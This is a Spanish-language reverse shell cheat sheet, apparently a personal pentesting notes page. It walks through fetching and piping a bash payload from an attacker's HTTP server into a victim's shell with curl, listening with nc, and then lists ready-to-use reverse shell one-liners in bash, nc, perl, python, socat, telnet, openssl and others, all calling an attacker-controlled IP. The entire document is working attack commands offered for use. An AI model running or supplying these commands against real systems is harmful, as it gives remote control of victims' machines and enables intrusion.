
Last updated on
Revershell cheet sheat
-
Paso 1: Tener ejecucion remota de comandos,
-
Paso 2: luego verificar si hay curl , lo haces con ” which curl”
-
Paso 3: luedo de la maquina atacante te abres un servidor http y creas un
-
index.html:
#!/bin/bash bash -i >& /dev/tcp/10.10.10.10/443 0>&1
-
y te pones en escucha en la maquina atacante con:
nc -nlvp 443
-
y ejecutas en la maquina victima lo siguiente
curl 10.10.10.10 | bash
-
obtendras una revershell(realizar tratamiento de la consola):
MAS FORMAS
-
NC
nc -e /bin/sh X.X.X.X 443
-
BASH
bash -i >& /dev/tcp/X.X.X.X/443 0>&1
-
PERL
perl -e 'use Socket;$i="X.X.X.X";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
-
PYTHON
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("X.X.X.X",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
-
SOCAT
socat file:tty,raw,echo=0 tcp-connect:X.X.X.X:443
-
SSH
ssh -R 443:localhost:443 user@X.X.X.X
-
TELNET
telnet X.X.X.X 443
-
mknod BASH
mknod backpipe p && nc X.X.X.X 443 0<backpipe | /bin/bash 1>backpipe
-
BASH /DEV/TCP
/bin/bash -i > /dev/tcp/X.X.X.X/443 0<&1 2>&1
-
openssl
openssl s_client -quiet -connect X.X.X.X:443
-
exec
exec 5<>/dev/tcp/X.X.X.X/443
-
xterm
xterm -display X.X.X.X:0
×![Imagen ampliada]()